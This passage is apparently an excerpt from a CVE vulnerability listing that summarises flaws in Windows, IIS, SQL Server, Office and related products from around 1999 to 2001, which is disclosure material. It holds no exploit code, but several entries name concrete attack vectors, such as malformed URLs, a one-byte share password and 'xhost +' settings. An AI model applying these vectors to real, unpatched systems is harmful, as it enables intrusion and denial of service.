request with a specific type. [CVE-2001-0238] Microsoft Data Access Component Internet Publishing Provider 8.103.2519.0 and earlier allows remote attackers to bypass Security Zone restrictions via WebDAV requests. [CVE-2001-0237] Memory leak in Microsoft 2000 domain controller allows remote attackers to cause a denial of service by repeatedly connecting to the Kerberos service and then disconnecting without sending any data. [CVE-2001-0191] gnuserv before 3.12, as shipped with XEmacs, does not properly check the specified length of an X Windows MIT-MAGIC-COOKIE cookie, which allows remote attackers to execute arbitrary commands via a buffer overflow, or brute force authentication by using a short cookie length. [CVE-2001-0152] The password protection option for the Compressed Folders feature in Plus! for Windows 98 and Windows Me writes password information to a file, which allows local users to recover the passwords and read the compressed folders. [CVE-2001-0149] Windows Scripting Host in Internet Explorer 5.5 and earlier allows remote attackers to read arbitrary files via the GetObject Javascript function and the htmlfile ActiveX object. [CVE-2001-0148] The WMP ActiveX Control in Windows Media Player 7 allows remote attackers to execute commands in Internet Explorer via javascript URLs, a variant of the "Frame Domain Verification" vulnerability. [CVE-2001-0147] Buffer overflow in Windows 2000 event viewer snap-in allows attackers to execute arbitrary commands via a malformed field that is improperly handled during the detailed view of event records. [CVE-2001-0146] IIS 5.0 and Microsoft Exchange 2000 allow remote attackers to cause a denial of service (memory allocation error) by repeatedly sending a series of specially formatted URL's. [CVE-2001-0137] Windows Media Player 7 allows remote attackers to execute malicious Java applets in Internet Explorer clients by enclosing the applet in a skin file named skin.wmz, then referencing that skin in the codebase parameter to an applet tag, aka the Windows Media Player Skins File Download" vulnerability. [CVE-2001-0083] Windows Media Unicast Service in Windows Media Services 4.0 and 4.1 does not properly shut down some types of connections, producing a memory leak that allows remote attackers to cause a denial of service via a series of severed connections, aka the "Severed Windows Media Server Connection" vulnerability. [CVE-2001-0048] The "Configure Your Server" tool in Microsoft 2000 domain controllers installs a blank password for the Directory Service Restore Mode, which allows attackers with physical access to the controller to install malicious programs, aka the "Directory Service Restore Mode Password" vulnerability. [CVE-2001-0046] The default permissions for the SNMP Parameters registry key in Windows NT 4.0 allows remote attackers to read and possibly modify the SNMP community strings to obtain sensitive information or modify network configuration, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0045] The default permissions for the RAS Administration key in Windows NT 4.0 allows local users to execute arbitrary commands by changing the value to point to a malicious DLL, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0018] Windows 2000 domain controller in Windows 2000 Server, Advanced Server, or Datacenter Server allows remote attackers to cause a denial of service via a flood of malformed service requests. [CVE-2001-0017] Memory leak in PPTP server in Windows NT 4.0 allows remote attackers to cause a denial of service via a malformed data packet, aka the "Malformed PPTP Packet Stream" vulnerability. [CVE-2001-0015] Network Dynamic Data Exchange (DDE) in Windows 2000 allows local users to gain SYSTEM privileges via a "WM_COPYDATA" message to an invisible window that is running with the privileges of the WINLOGON process. [CVE-2001-0014] Remote Data Protocol (RDP) in Windows 2000 Terminal Service does not properly handle certain malformed packets, which allows remote attackers to cause a denial of service, aka the "Invalid RDP Data" vulnerability. [CVE-2001-0006] The Winsock2ProtocolCatalogMutex mutex in Windows NT 4.0 has inappropriate Everyone/Full Control permissions, which allows local users to modify the permissions to "No Access" and disable Winsock network connectivity to cause a denial of service, aka the "Winsock Mutex" vulnerability. [CVE-2001-0005] Buffer overflow in the parsing mechanism of the file loader in Microsoft PowerPoint 2000 allows attackers to execute arbitrary commands. [CVE-2000-1227] Windows NT 4.0 and Windows 2000 hosts allow remote attackers to cause a denial of service (unavailable connections) by sending multiple SMB SMBnegprots requests but not reading the response that is sent back. [CVE-2000-1209] The "sa" account is installed with a default null password on (1) Microsoft SQL Server 2000, (2) SQL Server 7.0, and (3) Data Engine (MSDE) 1.0, including third party packages that use these products such as (4) Tumbleweed Secure Mail (MMS) (5) Compaq Insight Manager, and (6) Visio 2000, which allows remote attackers to gain privileges, as exploited by worms such as Voyager Alpha Force and Spida. [CVE-2000-1200] Windows NT allows remote attackers to list all users in a domain by obtaining the domain SID with the LsaQueryInformationPolicy policy function via a null session and using the SID to list the users. [CVE-2000-1149] Buffer overflow in RegAPI.DLL used by Windows NT 4.0 Terminal Server allows remote attackers to execute arbitrary commands via a long username, aka the "Terminal Server Login Buffer Overflow" vulnerability. [CVE-2000-1139] The installation of Microsoft Exchange 2000 before Rev. A creates a user account with a known password, which could allow attackers to gain privileges, aka the "Exchange User Account" vulnerability. [CVE-2000-1111] Telnet Service for Windows 2000 Professional does not properly terminate incomplete connection attempts, which allows remote attackers to cause a denial of service by connecting to the server and not providing any input. [CVE-2000-1105] The ixsso.query ActiveX Object is marked as safe for scripting, which allows malicious web site operators to embed a script that remotely determines the existence of files on visiting Windows 2000 systems that have Indexing Services enabled. [CVE-2000-1090] Microsoft IIS for Far East editions 4.0 and 5.0 allows remote attackers to read source code for parsed pages via a malformed URL that uses the lead-byte of a double-byte character. [CVE-2000-1089] Buffer overflow in Microsoft Phone Book Service allows local users to execute arbitrary commands, aka the "Phone Book Service Buffer Overflow" vulnerability. [CVE-2000-1088] The xp_SetSQLSecurity function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1087] The xp_proxiedmetadata function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1086] The xp_printstatements function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1085] The xp_peekqueue function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1084] The xp_updatecolvbm function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1083] The xp_showcolv function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1082] The xp_enumresultset function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1081] The xp_displayparamstmt function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1071] The GUI installation for iCal 2.1 Patch 2 disables access control for the X server using an "xhost +" command, which allows remote attackers to monitor X Windows events and gain privileges. [CVE-2000-1061] Microsoft Virtual Machine (VM) in Internet Explorer 4.x and 5.x allows an unsigned applet to create and use ActiveX controls, which allows a remote attacker to bypass Internet Explorer's security settings and execute arbitrary commands via a malicious web page or email, aka the "Microsoft VM ActiveX Component" vulnerability. [CVE-2000-1060] The default configuration of XFCE 3.5.1 bypasses the Xauthority access control mechanism with an "xhost + localhost" command in the xinitrc program, which allows local users to sniff X Windows traffic and gain privileges. [CVE-2000-1059] The default configuration of the Xsession file in Mandrake Linux 7.1 and 7.0 bypasses the Xauthority access control mechanism with an "xhost + localhost" command, which allows local users to sniff X Windows events and gain privileges. [CVE-2000-1034] Buffer overflow in the System Monitor ActiveX control in Windows 2000 allows remote attackers to execute arbitrary commands via a long LogFileName parameter in HTML source code, aka the "ActiveX Parameter Validation" vulnerability. [CVE-2000-1006] Microsoft Exchange Server 5.5 does not properly handle a MIME header with a blank charset specified, which allows remote attackers to cause a denial of service via a charset="" command, aka the "Malformed MIME Header" vulnerability. [CVE-2000-1003] NETBIOS client in Windows 95 and Windows 98 allows a remote attacker to cause a denial of service by changing a file sharing service to return an unknown driver type, which causes the client to crash. [CVE-2000-0991] Buffer overflow in Hilgraeve, Inc. HyperTerminal client on Windows 98, ME, and 2000 allows remote attackers to execute arbitrary commands via a long telnet URL, aka the "HyperTerminal Buffer Overflow" vulnerability. [CVE-2000-0983] Microsoft NetMeeting with Remote Desktop Sharing enabled allows remote attackers to cause a denial of service (CPU utilization) via a sequence of null bytes to the NetMeeting port, aka the "NetMeeting Desktop Sharing" vulnerability. [CVE-2000-0980] NMPI (Name Management Protocol on IPX) listener in Microsoft NWLink does not properly filter packets from a broadcast address, which allows remote attackers to cause a broadcast storm and flood the network. [CVE-2000-0979] File and Print Sharing service in Windows 95, Windows 98, and Windows Me does not properly check the password for a file share, which allows remote attackers to bypass share access controls by sending a 1-byte password that matches the first character of the real password, aka the "Share Level Password" vulnerability. [CVE-2000-0933] The Input Method Editor (IME) in the Simplified Chinese version of Windows 2000 does not disable access to privileged functionality that should normally be restricted, which allows local users to gain privileges, aka the "Simplified Chinese IME State Recognition" vulnerability. [CVE-2000-0885] Buffer overflows in Microsoft Network Monitor (Netmon) allow remote attackers to execute arbitrary commands via a long Browser Name in a CIFS Browse Frame, a long SNMP community name, or a long username or filename in an SMB session, aka the "Netmon Protocol Parsing" vulnerability. NOTE: It is highly likely that this candidate will be split into multiple candidates. [CVE-2000-0854] When a Microsoft Office 2000 document is launched, the directory of that document is first used to locate DLL's such as riched20.dll and msi.dll, which could allow an attacker to execute arbitrary commands by inserting a Trojan Horse DLL into the same directory as the document. [CVE-2000-0851] Buffer overflow in the Still Image Service in Windows 2000 allows local users to gain additional privileges via a long WM_USER message, aka the "Still Image Service Privilege Escalation" vulnerability. [CVE-2000-0834] The Windows 2000 telnet client attempts to perform NTLM authentication by default, which allows remote attackers to capture and replay the NTLM challenge/response via a telnet:// URL that points to the malicious server, aka the "Windows 2000 Telnet Client NTLM Authentication" vulnerability. [CVE-2000-0830] annclist.exe in webTV for Windows allows remote attackers to cause a denial of service by via a large, malformed UDP packet to ports 22701 through 22705. [CVE-2000-0817] Buffer overflow in the HTTP protocol parser for Microsoft Network Monitor (Netmon) allows remote attackers to execute arbitrary commands via malformed data, aka the "Netmon Protocol Parsing" vulnerability. [CVE-2000-0788] The Mail Merge tool in Microsoft Word does not prompt the user before executing Visual Basic (VBA) scripts in an Access database, which could allow an attacker to execute arbitrary commands. [CVE-2000-0777] The password protection feature of Microsoft Money can store the password in plaintext, which allows attackers with physical access to the system to obtain the password, aka the "Money Password" vulnerability. [CVE-2000-0765] Buffer overflow in the HTML interpreter in Microsoft Office 2000 allows an attacker to execute arbitrary commands via a long embedded object tag, aka the "Microsoft Office HTML Object Tag" vulnerability. [CVE-2000-0756] Microsoft Outlook 2000 does not properly process long or malformed fields in vCard (.vcf) files, which allows attackers to cause a denial of service. [CVE-2000-0753] The Microsoft Outlook mail client identifies the physical path of the sender's machine within a winmail.dat attachment to Rich Text Format (RTF) files. [CVE-2000-0737] The Service Control Manager (SCM) in Windows 2000 creates predictable named pipes, which allows a local user with console access to gain administrator privileges, aka the "Service Control Manager Named Pipe Impersonation" vulnerability. [CVE-2000-0710] The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers determine the physical path of the server components by requesting an invalid URL whose name includes a standard DOS device name. [CVE-2000-0709] The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers to cause a denial of service in some components by requesting a URL whose name includes a standard DOS device name. [CVE-2000-0663] The registry entry for the Windows Shell executable (Explorer.exe) in Windows NT and Windows 2000 uses a relative path name, which allows local users to execute arbitrary commands by inserting a Trojan Horse named Explorer.exe into the %Systemdrive% directory, aka the "Relative Shell Path" vulnerability. [CVE-2000-0662] Internet Explorer 5.x and Microsoft Outlook allows remote attackers to read arbitrary files by redirecting the contents of an IFRAME using the DHTML Edit Control (DHTMLED). [CVE-2000-0654] Microsoft Enterprise Manager allows local users to obtain database passwords via the Data Transformation Service (DTS) package Registered Servers Dialog dialog, aka a variant of the "DTS Password" vulnerability. [CVE-2000-0637] Microsoft Excel 97 and 2000 allows an attacker to execute arbitrary commands by specifying a malicious .dll using the Register.ID function, aka the "Excel REGISTER.ID Function" vulnerability. [CVE-2000-0621] Microsoft Outlook 98 and 2000, and Outlook Express 4.0x and 5.0x, allow remote attackers to read files on the client's system via a malformed HTML message that stores files outside of the cache, aka the "Cache Bypass" vulnerability. [CVE-2000-0612] Windows 95 and Windows 98 do not properly process spoofed ARP packets, which allows remote attackers to overwrite static entries in the cache table. [CVE-2000-0603] Microsoft SQL Server 7.0 allows a local user to bypass permissions for stored procedures by referencing them via a temporary stored procedure, aka the "Stored Procedure Permissions" vulnerability. [CVE-2000-0597] Microsoft Office 2000 (Excel and PowerPoint) and PowerPoint 97 are marked as safe for scripting, which allows remote attackers to force Internet Explorer or some email clients to save files to arbitrary locations via the Visual Basic for Applications (VBA) SaveAs function, aka the "Office HTML Script" vulnerability. [CVE-2000-0596] Internet Explorer 5.x does not warn a user before opening a Microsoft Access database file that is referenced within ActiveX OBJECT tags in an HTML document, which could allow remote attackers to execute arbitrary commands, aka the "IE Script" vulnerability. [CVE-2000-0581] Windows 2000 Telnet Server allows remote attackers to cause a denial of service by sending a continuous stream of binary zeros, which causes the server to crash. [CVE-2000-0580] Windows 2000 Server allows remote attackers to cause a denial of service by sending a continuous stream of binary zeros to various TCP and UDP ports, which significantly increases the CPU utilization. [CVE-2000-0567] Buffer overflow in Microsoft Outlook and Outlook Express allows remote attackers to execute arbitrary commands via a long Date field in an email header, aka the "Malformed E-mail Header" vulnerability. [CVE-2000-0563] The URLConnection function in MacOS Runtime Java (MRJ) 2.1 and earlier and the Microsoft virtual machine (VM) for MacOS allows a malicious web site operator to connect to arbitrary hosts using a HTTP redirection, in violation of the Java security model. [CVE-2000-0544] Windows NT and Windows 2000 hosts allow a remote attacker to cause a denial of service via malformed DCE/RPC SMBwriteX requests that contain an invalid data length. [CVE-2000-0524] Microsoft Outlook and Outlook Express allow remote attackers to cause a denial of service by sending email messages with blank fields such as BCC, Reply-To, Return-Path, or From. [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters. [CVE-2000-0487] The Protected Store in Windows 2000 does not properly select the strongest encryption when available, which causes it to use a default of 40-bit encryption instead of 56-bit DES encryption, aka the "Protected Store Key Length" vulnerability. [CVE-2000-0485] Microsoft SQL Server allows local users to obtain database passwords via the Data Transformation Service (DTS) package Properties dialog, aka the "DTS Password" vulnerability. [CVE-2000-0475] Windows 2000 allows a local user process to access another user's desktop within the same windows station, aka the "Desktop Separation" vulnerability. [CVE-2000-0420] The default configuration of SYSKEY in Windows 2000 stores the startup key in the registry, which could allow an attacker tor ecover it and use it to decrypt Encrypted File System (EFS) data. [CVE-2000-0403] The CIFS Computer Browser service on Windows NT 4.0 allows a remote attacker to cause a denial of service by sending a large number of host announcement requests to the master browse tables, aka the "HostAnnouncement Flooding" or "HostAnnouncement Frame" vulnerability. [CVE-2000-0402] The Mixed Mode authentication capability in Microsoft SQL Server 7.0 stores the System Administrator (sa) account in plaintext in a log file which is readable by any user, aka the "SQL Server 7.0 Service Pack Password" vulnerability. [CVE-2000-0400] The Microsoft Active Movie ActiveX Control in Internet Explorer 5 does not restrict which file types can be downloaded, which allows an attacker to download any type of file to a user's system by encoding it within an email message or news post. [CVE-2000-0377] The Remote Registry server in Windows NT 4.0 allows local authenticated users to cause a denial of service via a malformed request, which causes the winlogon process to fail, aka the "Remote Registry Access Authentication" vulnerability. [CVE-2000-0347] Windows 95 and Windows 98 allow a remote attacker to cause a denial of service via a NetBIOS session request packet with a NULL source name. [CVE-2000-0330] The networking software in Windows 95 and Windows 98 allows remote attackers to execute commands via a long file name string, aka the "File Access URL" vulnerability. [CVE-2000-0329] A Microsoft ActiveX control allows a remote attacker to execute a malicious cabinet file via an attachment and an embedded script in an HTML mail, aka the "Active Setup Control" vulnerability. [CVE-2000-0328] Windows NT 4.0 generates predictable random TCP initial sequence numbers (ISN), which allows remote attackers to perform spoofing and session hijacking. [CVE-2000-0327] Microsoft Virtual Machine (VM) allows remote attackers to escape the Java sandbox and execute commands via an applet containing an illegal cast operation, aka the "Virtual Machine Verifier" vulnerability. [CVE-2000-0325] The Microsoft Jet database engine allows an attacker to execute commands via a database query, aka the "VBA Shell" vulnerability. [CVE-2000-0323] The Microsoft Jet database engine allows an attacker to modify text files via a database query, aka the "Text I-ISAM" vulnerability. [CVE-2000-0311] The Windows 2000 domain controller allows a malicious user to modify Active Directory information by modifying an unprotected attribute, aka the "Mixed Object Access" vulnerability. [CVE-2000-0305] Windows 95, Windows 98, Windows 2000, Windows NT 4.0, and Terminal Server systems allow a remote attacker to cause a denial of service by sending a large number of identical fragmented IP packets, aka jolt2 or the "IP Fragment Reassembly" vulnerability. [CVE-2000-0304] Microsoft IIS 4.0 and 5.0 with the IISADMPWD virtual directory installed allows a remote attacker to cause a denial of service via a malformed request to the inetinfo.exe program, aka the "Undelimited .HTR Request" vulnerability. [CVE-2000-0302] Microsoft Index Server allows remote attackers to view the source code of ASP files by appending a %20 to the filename in the CiWebHitsFile argument to the null.htw URL. [CVE-2000-0298] The unattended installation of Windows 2000 with the OEMPreinstall option sets insecure permissions for the All Users and Default Users directories. [CVE-2000-0277] Microsoft Excel 97 and 2000 does not warn the user when executing Excel Macro Language (XLM) macros in external text files, which could allow an attacker to execute a macro virus, aka the "XLM Text Macro" vulnerability. [CVE-2000-0260] Buffer overflow in the dvwssr.dll DLL in Microsoft Visual Interdev 1.0 allows users to cause a denial of service or execute commands, aka the "Link View Server-Side Component" vulnerability. [CVE-2000-0259] The default permissions for the Cryptography\Offload registry key used by the OffloadModExpo in Windows NT 4.0 allows local users to obtain compromise the cryptographic keys of other users. [CVE-2000-0232] Microsoft TCP/IP Printing Services, aka Print Services for Unix, allows an attacker to cause a denial of service via a malformed TCP/IP print request. [CVE-2000-0222] The installation for Windows 2000 does not activate the Administrator password until the system has rebooted, which allows remote attackers to connect to the ADMIN$ share without a password until the reboot occurs. [CVE-2000-0211] The Windows Media server allows remote attackers to cause a denial of service via a series of client handshake packets that are sent in an improper sequence, aka the "Misordered Windows Media Services Handshake" vulnerability. [CVE-2000-0202] Microsoft SQL Server 7.0 and Microsoft Data Engine (MSDE) 1.0 allow remote attackers to gain privileges via a malformed Select statement in an SQL query. [CVE-2000-0201] The window.showHelp() method in Internet Explorer 5.x does not restrict HTML help files (.chm) to be executed from the local host, which allows remote attackers to execute arbitrary commands via Microsoft Networking. [CVE-2000-0200] Buffer overflow in Microsoft Clip Art Gallery allows remote attackers to cause a denial of service or execute commands via a malformed CIL (clip art library) file, aka the "Clip Art Buffer Overrun" vulnerability. [CVE-2000-0199] When a new SQL Server is registered in Enterprise Manager for Microsoft SQL Server 7.0 and the "Always prompt for login name and password" option is not set, then the Enterprise Manager uses weak encryption to store the login ID and password. [CVE-2000-0197] The Windows NT scheduler uses the drive mapping of the interactive user who is currently logged onto the system, which allows the local user to gain privileges by providing a Trojan horse batch file in place of the original batch file. [CVE-2000-0162] The Microsoft virtual machine (VM) in Internet Explorer 4.x and 5.x allows a remote attacker to read files via a malicious Java applet that escapes the Java sandbox, aka the "VM File Reading" vulnerability. [CVE-2000-0161] Sample web sites on Microsoft Site Server 3.0 Commerce Edition do not validate an identification number, which allows remote attackers to execute SQL commands. [CVE-2000-0160] The Microsoft Active Setup ActiveX component in Internet Explorer 4.x and 5.x allows a remote attacker to install software components without prompting the user by stating that the software's manufacturer is Microsoft. [CVE-2000-0155] Windows NT Autorun executes the autorun.inf file on non-removable media, which allows local attackers to specify an alternate program to execute when other users access a drive. [CVE-2000-0132] Microsoft Java Virtual Machine allows remote attackers to read files via the getSystemResourceAsStream function. [CVE-2000-0121] The Recycle Bin utility in Windows NT and Windows 2000 allows local users to read or modify files by creating a subdirectory with the victim's SID in the recycler directory, aka the "Recycle Bin Creation" vulnerability. [CVE-2000-0119] The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection. [CVE-2000-0098] Microsoft Index Server allows remote attackers to determine the real path for a web directory via a request to an Internet Data Query file that does not exist. [CVE-2000-0097] The WebHits ISAPI filter in Microsoft Index Server allows remote attackers to read arbitrary files, aka the "Malformed Hit-Highlighting Argument" vulnerability. [CVE-2000-0073] Buffer overflow in Microsoft Rich Text Format (RTF) reader allows attackers to cause a denial of service via a malformed control word. [CVE-2000-0070] NtImpersonateClientOfPort local procedure call in Windows NT 4.0 allows local users to gain privileges, aka "Spoofed LPC Port Request." [CVE-2000-0053] Microsoft Commercial Internet System (MCIS) IMAP server allows remote attackers to cause a denial of service via a malformed IMAP request. [CVE-1999-1593] Windows Internet Naming Service (WINS) allows remote attackers to cause a denial of service (connectivity loss) or steal credentials via a 1Ch registration that causes WINS to change the domain controller to point to a malicious server. NOTE: this problem may be limited when Windows 95/98 clients are used, or if the primary domain controller becomes unavailable. [CVE-1999-1591] Microsoft Internet Information Services (IIS) server 4.0 SP4, without certain hotfixes released for SP4, does not require authentication credentials under certain conditions, which allows remote attackers to bypass authentication requirements, as demonstrated by connecting via Microsoft Visual InterDev 6.0. [CVE-1999-1584] Unknown vulnerability in (1) loadmodule, and (2) modload if modload is installed with setuid/setgid privileges, in SunOS 4.1.1 through 4.1.3c, and Open Windows 3.0, allows local users to gain root privileges via environment variables, a different vulnerability than CVE-1999-1586. [CVE-1999-1581] Memory leak in Simple Network Management Protocol (SNMP) agent (snmp.exe) for Windows NT 4.0 before Service Pack 4 allows remote attackers to cause a denial of service (memory consumption) via a large number of SNMP packets with Object Identifiers (OIDs) that cannot be decoded. [CVE-1999-1579] The Cenroll ActiveX control (xenroll.dll) for Terminal Server Editions of Windows NT 4.0 and Windows NT Server 4.0 before SP6 allows remote attackers to cause a denial of service (resource consumption) by creating a large number of arbitrary files on the target machine. [CVE-1999-1556] Microsoft SQL Server 6.5 uses weak encryption for the password for the SQLExecutiveCmdExec account and stores it in an accessible portion of the registry, which could allow local users to gain privileges by reading and decrypting the CmdExecAccount value. [CVE-1999-1544] Buffer overflow in FTP server in Microsoft IIS 3.0 and 4.0 allows local and sometimes remote attackers to cause a denial of service via a long NLST (ls) command. [CVE-1999-1531] Buffer overflow in IBM HomePagePrint 1.0.7 for Windows98J allows a malicious Web site to execute arbitrary code on a viewer's system via a long IMG_SRC HTML tag. [CVE-1999-1520] A configuration problem in the Ad Server Sample directory (AdSamples) in Microsoft Site Server 3.0 allows an attacker to obtain the SITE.CSC file, which exposes sensitive SQL database information. [CVE-1999-1476] A bug in Intel Pentium processor (MMX and Overdrive) allows local users to cause a denial of service (hang) in Intel-based operating systems such as Windows NT and Windows 95, via an invalid instruction, aka the "Invalid Operand with Locked CMPXCHG8B Instruction" problem. [CVE-1999-1463] Windows NT 4.0 before SP3 allows remote attackers to bypass firewall restrictions or cause a denial of service (crash) by sending improperly fragmented IP packets without the first fragment, which the TCP/IP stack incorrectly reassembles into a valid session. [CVE-1999-1455] RSH service utility RSHSVC in Windows NT 3.5 through 4.0 does not properly restrict access as specified in the .Rhosts file when a user comes from an authorized host, which could allow unauthorized users to access the service by logging in from an authorized host. [CVE-1999-1454] Macromedia "The Matrix" screen saver on Windows 95 with the "Password protected" option enabled allows attackers with physical access to the machine to bypass the password prompt by pressing the ESC (Escape) key. [CVE-1999-1452] GINA in Windows NT 4.0 allows attackers with physical access to display a portion of the clipboard of the user who has locked the workstation by pasting (CTRL-V) the contents into the username prompt. [CVE-1999-1430] PIM software for Royal daVinci does not properly password-protext access to data stored in the .mdb (Microsoft Access) file, which allows local users to read the data without a password by directly accessing the files with a different application, such as Access. [CVE-1999-1387] Windows NT 4.0 SP2 allows remote attackers to cause a denial of service (crash), possibly via malformed inputs or packets, such as those generated by a Linux smbmount command that was compiled on the Linux 2.0.29 kernel but executed on Linux 2.0.25. [CVE-1999-1380] Symantec Norton Utilities 2.0 for Windows 95 marks the TUNEOCX.OCX ActiveX control as safe for scripting, which allows remote attackers to execute arbitrary commands via the run option through malicious web pages that are accessed by browsers such as Internet Explorer 3.0. [CVE-1999-1368] AV Option for MS Exchange Server option for InoculateIT 4.53, and possibly other versions, only scans the Inbox folder tree of a Microsoft Exchange server, which could allow viruses to escape detection if a user's rules cause the message to be moved to a different mailbox. [CVE-1999-1365] Windows NT searches a user's home directory (%systemroot% by default) before other directories to find critical programs such as NDDEAGNT.EXE, EXPLORER.EXE, USERINIT.EXE or TASKMGR.EXE, which could allow local users to bypass access restrictions or gain privileges by placing a Trojan horse program into the root directory, which is writable by default. [CVE-1999-1364] Windows NT 4.0 allows local users to cause a denial of service (crash) via an illegal kernel mode address to the functions (1) GetThreadContext or (2) SetThreadContext. [CVE-1999-1363] Windows NT 3.51 and 4.0 allow local users to cause a denial of service (crash) by running a program that creates a large number of locks on a file, which exhausts the NonPagedPool. [CVE-1999-1362] Win32k.sys in Windows NT 4.0 before SP2 allows local users to cause a denial of service (crash) by calling certain WIN32K functions with incorrect parameters. [CVE-1999-1361] Windows NT 3.51 and 4.0 running WINS (Windows Internet Name Service) allows remote attackers to cause a denial of service (resource exhaustion) via a flood of malformed packets, which causes the server to slow down and fill the event logs with error messages. [CVE-1999-1360] Windows NT 4.0 allows local users to cause a denial of service via a user mode application that closes a handle that was opened in kernel mode, which causes a crash when the kernel attempts to close the handle. [CVE-1999-1359] When the Ntconfig.pol file is used on a server whose name is longer than 13 characters, Windows NT does not properly enforce policies for global groups, which could allow users to bypass restrictions that were intended by those policies. [CVE-1999-1358] When an administrator in Windows NT or Windows 2000 changes a user policy, the policy is not properly updated if the local ntconfig.pol is not writable by the user, which could allow local users to bypass restrictions that would otherwise be enforced by the policy, possibly by changing the policy file to be read-only. [CVE-1999-1356] Compaq Integration Maintenance Utility as used in Compaq Insight Manager agent before SmartStart 4.50 modifies the legal notice caption (LegalNoticeCaption) and text (LegalNoticeText) in Windows NT, which could produce a legal notice that is in violation of the security policy. [CVE-1999-1324] VAXstations running Open VMS 5.3 through 5.5-2 with VMS DECwindows or MOTIF do not properly disable access to user accounts that exceed the break-in limit threshold for failed login attempts, which makes it easier for attackers to conduct brute force password guessing. [CVE-1999-1317] Windows NT 4.0 SP4 and earlier allows local users to gain privileges by modifying the symbolic link table in the \?? object folder using a different case letter (upper or lower) to point to a different device. [CVE-1999-1316] Passfilt.dll in Windows NT SP2 allows users to create a password that contains the user's name, which could make it easier for an attacker to guess. [CVE-1999-1297] cmdtool in OpenWindows 3.0 and XView 3.0 in SunOS 4.1.4 and earlier allows attackers with physical access to the system to display unechoed characters (such as those from password prompts) via the L2/AGAIN key. [CVE-1999-1294] Office Shortcut Bar (OSB) in Windows 3.51 enables backup and restore permissions, which are inherited by programs such as File Manager that are started from the Shortcut Bar, which could allow local users to read folders for which they do not have permission. [CVE-1999-1289] ICQ 98 beta on Windows NT leaks the internal IP address of a client in the TCP data segment of an ICQ packet instead of the public address (e.g. through NAT), which provides remote attackers with potentially sensitive information about the client or the internal network configuration. [CVE-1999-1279] An interaction between the AS/400 shared folders feature and Microsoft SNA Server 3.0 and earlier allows users to view each other's folders when the users share the same Local APPC LU. [CVE-1999-1259] Microsoft Office 98, Macintosh Edition, does not properly initialize the disk space used by Office 98 files and effectively inserts data from previously deleted files into the Office file, which could allow attackers to obtain sensitive information. [CVE-1999-1254] Windows 95, 98, and NT 4.0 allow remote attackers to cause a denial of service by spoofing ICMP redirect messages from a router, which causes Windows to change its routing tables. [CVE-1999-1246] Direct Mailer feature in Microsoft Site Server 3.0 saves user domain names and passwords in plaintext in the TMLBQueue network share, which has insecure default permissions, allowing remote attackers to read the passwords and gain privileges. [CVE-1999-1234] LSA (LSASS.EXE) in Windows NT 4.0 allows remote attackers to cause a denial of service via a NULL policy handle in a call to (1) SamrOpenDomain, (2) SamrEnumDomainUsers, and (3) SamrQueryDomainInfo. [CVE-1999-1222] Netbt.sys in Windows NT 4.0 allows remote malicious DNS servers to cause a denial of service (crash) by returning 0.0.0.0 as the IP address for a DNS host name lookup. [CVE-1999-1217] The PATH in Windows NT includes the current working directory (.), which could allow local users to gain privileges by placing Trojan horse programs with the same name as commonly used system programs into certain directories. [CVE-1999-1206] SystemSoft SystemWizard package in HP Pavilion PC with Windows 98, and possibly other platforms and operating systems, installs two ActiveX controls that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via a malicious web page that references (1) the Launch control, or (2) the RegObj control. [CVE-1999-1201] Windows 95 and Windows 98 systems, when configured with multiple TCP/IP stacks bound to the same MAC address, allow remote attackers to cause a denial of service (traffic amplification) via a certain ICMP echo (ping) packet, which causes all stacks to send a ping response, aka TCP Chorusing. [CVE-1999-1189] Buffer overflow in Netscape Navigator/Communicator 4.7 for Windows 95 and Windows 98 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long argument after the ? character in a URL that references an .asp, .cgi, .html, or .pl file. 